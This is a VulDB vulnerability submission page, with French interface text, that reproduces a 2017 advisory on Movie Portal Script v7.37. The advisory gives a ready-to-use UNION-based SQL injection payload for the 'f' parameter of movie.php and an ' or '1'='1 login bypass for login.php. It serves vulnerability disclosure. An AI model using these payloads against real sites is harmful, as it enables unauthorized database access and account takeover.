Soumettre #13: Movie Portal Script v7.37 – Multiple Vulnerabilitiesinformation

TitreMovie Portal Script v7.37 – Multiple Vulnerabilities
DescriptionIntroduction Exploit Title: Movie Portal Script v7.37 – Multiple Vulnerabilities Date: 30.01.2017 Vendor Homepage: http://itechscripts.com/ Software Link: http://itechscripts.com/b2b-script/ Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview Movie Portal Script v7.37 is undoubtedly the finest movie portal. Vulnerabilities: ------------------------------------------------ SQL Injection URL : http://localhost/movie-portal-script/movie.php?f=10[payload] Parameter: f (GET) Type: UNION query Title: Generic UNION query (NULL) - 34 columns Payload: f=-2245 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787a71,0x644b626f666d766b5551474756446f6e596d57784165697044776879524c7264714164476e624e55,0x716a6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MmOv ------------------------------------------------ Authentication Bypass http://localhost/movie-portal-script/login.php username : anyusername password : ' or '1'='1 ------------------------------------------------
Utilisateur
 KAAN KAMIS (UID 213)
Soumission30/01/2017 13:27 (il y a 9 ans)
Modérer30/01/2017 21:56 (8 hours later)
StatutAccepté
Entrée VulDB96286 [Movie Portal Script 7.37 movie.php f injection SQL]
Points17

PrécédentAperçuSuivant

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!